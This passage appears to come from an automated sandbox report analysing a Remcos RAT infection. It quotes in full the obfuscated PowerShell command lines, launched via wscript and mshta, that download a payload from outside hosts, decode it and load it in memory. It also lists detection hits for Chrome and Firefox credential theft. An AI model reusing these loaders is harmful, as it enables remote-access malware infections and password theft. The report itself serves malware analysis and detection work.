                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdv0ziagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc10exblicagicagicagicagicagicagicagicagicagicagicagic1tzw1czxjezwzjbkluaw9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbuy2twtgosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifzjvixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrvhsblbkcnbouwmsdwludcagicagicagicagicagicagicagicagicagicagicagicbirwp6leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5wlztc0rnzgrpktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpqxl3bmkiicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu1bhq2ugicagicagicagicagicagicagicagicagicagicagicagsxjseiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq1dgy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaumjkvnduvc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmvhdc50suyilcikru5wokfquerbvefcc2vlagf2aw5nzmfjaw5nymvzdhroawduc3rvz2v0bwviywnrd2l0agvudglyzxrpbwvncmuudmjtiiwwldapo3n0qxjulxnsruvwkdmpo0lfwcagicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzwhhdmluz2zhy2luz2jlc3r0aglnbnn0b2dldg1lymfja3dpdghlbnrpcmv0aw1lz3jllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicr2zxjcb1nlchjfrmvyzu5dzs5ut3n0cklurygpwzesm10rj1gnluppau4njykokcdvcglpbwfnzvvybca9iglmzgh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0jysnnxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9jysnzmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygawzko29waxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7b3bpaw1hz2vcexrlcya9ig9waxdlyknsawvudc5eb3dubg9hzerhdgeob3bpaw1hz2vvcmwpo29wawltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkg8nkydwawltywdlqnl0zxmpo29waxn0yxj0rmxhzya9iglmzdw8qkftrty0x1nuqvjupj5pzmq7b3bpzw5krmxhzya9iglmzdw8qkftrty0x0vord4+awzko29waxn0yxj0sw5kzxggpsbvcglpbwfnzvrlehqusw5kzxhpzihvjysncglzjysndgfydezsywcpo29wawvuzeluzgv4id0gb3bpaw1hz2vuzxh0lkluzgv4t2yob3bpzw5krmxhzyk7b3bpc3rhcnrjbmrlecatjysnz2ugmcatyw5kig9wawvuzeluzgv4ic1ndcbvcglzdgfydeluzgunkyd4o29waxn0yxj0sw5kzxggkz0gb3bpc3rhcnrgbgfnlkxlbmd0adtvcccrj2liyxnlnjrmzw5ndgggpsbvcgllbmrjbmrlecatig9waxn0yxj0sw5kzxg7b3bpymfzzty0q29tbwfuzca9ig9wawltywdlvgv4dc5tdwjzdccrj3jpbmcob3bpc3rhcnqnkydjbmrlecwgb3bpymfzzty0tgvuz3rokttvcgliyxnlnjrszxzlcnnlzca9ic1qbycrj2luichvcgliyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgmfenkydsiezvckvhy2gtt2jqzwn0ihsgb3bpxyb9kvsnkyctms4ulshvcgliyxnlnjrdb21tyw5klkxlbmd0acldo29wawnvbw1hbmrcexrlcya9ifttescrj3n0zw0uq29udicrj2unkydydf06okzyb21cyxnljysnnjrtdhjpbmcob3bpymfzzty0umv2zxjzzwqpo29wawxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw8nkydulkfzc2vtymx5xto6tg9hzchvcgljb21tyw5kqnl0zxmpo29waxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoawynkydkvkfjawzkjysnkttvcgl2ywlnzxrob2qusw52b2tlkg9waw51bgwsieaoawzkdhh0lkderfjesc81nc85mi4nkycwmjiumy4yotevlzpwdhroawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrkzxnhdgl2ywrvawzklcbpzmrdyxnqb2xpzmqsiglmzgrlc2f0axynkydhzg8nkydpzmqsiglmzgrlc2f0jysnaxzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdgl2ywrvawzklglmzgrlc2f0axzhzg9pzmqsawzkzgvzyxrpdmfkb2lmzcxpzmrkzxnhdccrj2l2ywrvawzklglmzdfpzmqsawzkzgvzyxrpdmfkb2lmjysnzckpoycplnjluexbq2uojzbrbccsw1n0cmlur11bq2hbcl0xmjqplnjluexbq2uoj2lmzccsw1n0cmlur11bq2hbcl0zoskucmvqtefdzsgow0noqxjdmtexk1tdaefyxtexmitbq2hbcl0xmduplcckjykp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $verbosepreference.tostring()[1,3]+'x'-join'')(('opiimageurl = ifdhttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu4'+'5t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebclient = new-object system.net.webclient;opiimagebytes = opiwebclient.downloaddata(opiimageurl);opiimagetext = [system.text.encoding]::utf8.getstring(o'+'piimagebytes);opistartflag = ifd<<base64_start>>ifd;opiendflag = ifd<<base64_end>>ifd;opistartindex = opiimagetext.indexof(o'+'pis'+'tartflag);opiendindex = opiimagetext.indexof(opiendflag);opistartindex -'+'ge 0 -and opiendindex -gt opistartinde'+'x;opistartindex += opistartflag.length;op'+'ibase64length = opiendindex - opistartindex;opibase64command = opiimagetext.subst'+'ring(opistart'+'index, opibase64length);opibase64reversed = -jo'+'in (opibase64command.tochararray() 0q'+'l foreach-object { opi_ })['+'-1..-(opibase64command.length)];opicommandbytes = [sy'+'stem.conv'+'e'+'rt]::frombase'+'64string(opibase64reversed);opiloadedassembly = [system.reflectio'+'n.assembly]::load(opicommandbytes);opivaimethod = [dnlib.io.home].getmethod(if'+'dvaiifd'+');opivaimethod.invoke(opinull, @(ifdtxt.gddrdh/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdcaspolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').replace('0ql',[string][char]124).replace('ifd',[string][char]39).replace(([char]111+[char]112+[char]105),'$'))"
                    Source: logs.dat.31.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433E0A cpuid 34_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,34_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,34_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,34_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,34_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_00450E6A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00434010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041A7A2 GetUserNameW,34_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,34_2_0044800F
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data34_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db34_2_0040B335

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe34_2_00405042

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting                    		Valid Accounts1
                    Native API                    		121
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		13
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
